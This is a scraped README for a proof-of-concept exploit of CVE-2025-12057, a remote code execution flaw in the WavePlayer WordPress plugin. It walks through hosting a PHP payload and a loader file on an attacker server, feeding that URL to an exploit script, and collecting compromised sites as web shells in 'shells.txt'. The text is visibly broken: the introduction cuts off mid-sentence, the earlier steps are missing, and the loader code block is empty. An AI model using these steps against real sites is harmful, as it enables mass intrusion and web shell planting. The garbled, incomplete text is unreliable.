Share
## https://sploitus.com/exploit?id=30AA1BFA-2FDD-56E9-877B-C9D6C4674688
# CVE-2025-12057 โ€“ WordPress WavePlayer RCE PoC

Proof of Concept (PoC) for **CVE-2025-12057**, a critical vulnerability affecting the **WavePlayer WordPress plugin (
```

---

## 4. Make the payload downloadable

The exploit requires a **direct downloadable PHP payload URL**.

To do this, create another PHP file **in the same directory as the payload**.

Example structure:

```
payload.php
loader.php
```

Content of `loader.php`:

```php

```

Explanation:

- `$file = "payload.php";` โ†’ name of the payload file to serve  
- `header("Content-Type: application/x-httpd-php");` โ†’ forces the server to return the file as PHP  
- `readfile($file);` โ†’ outputs the payload content  

This allows the exploit script to download the payload correctly.

---

## 5. Use your payload URL

Upload both files to your server.

Example payload URL:

```
http://your-server.com/loader.php
```

When the script asks for the **payload URL**, provide the link to `loader.php`.

---

## 6. Results

Successful exploited targets will be saved in:

```
shells.txt
```

Example output:

```
https://example.com/wp-content/uploads/peaks/external/{random_numbers}.php
https://target2.com/wp-content/uploads/peaks/external/{random_numbers}.php
```

---

# Keywords

wordpress exploit  
wordpress poc  
wordpress rce  
waveplayer exploit  
arbitrary file upload  
remote code execution  
bug bounty  
cve-2025-12057  

---

# Disclaimer

This project is provided **for educational purposes and authorized security testing only**.

The author is not responsible for misuse or illegal activities performed using this code.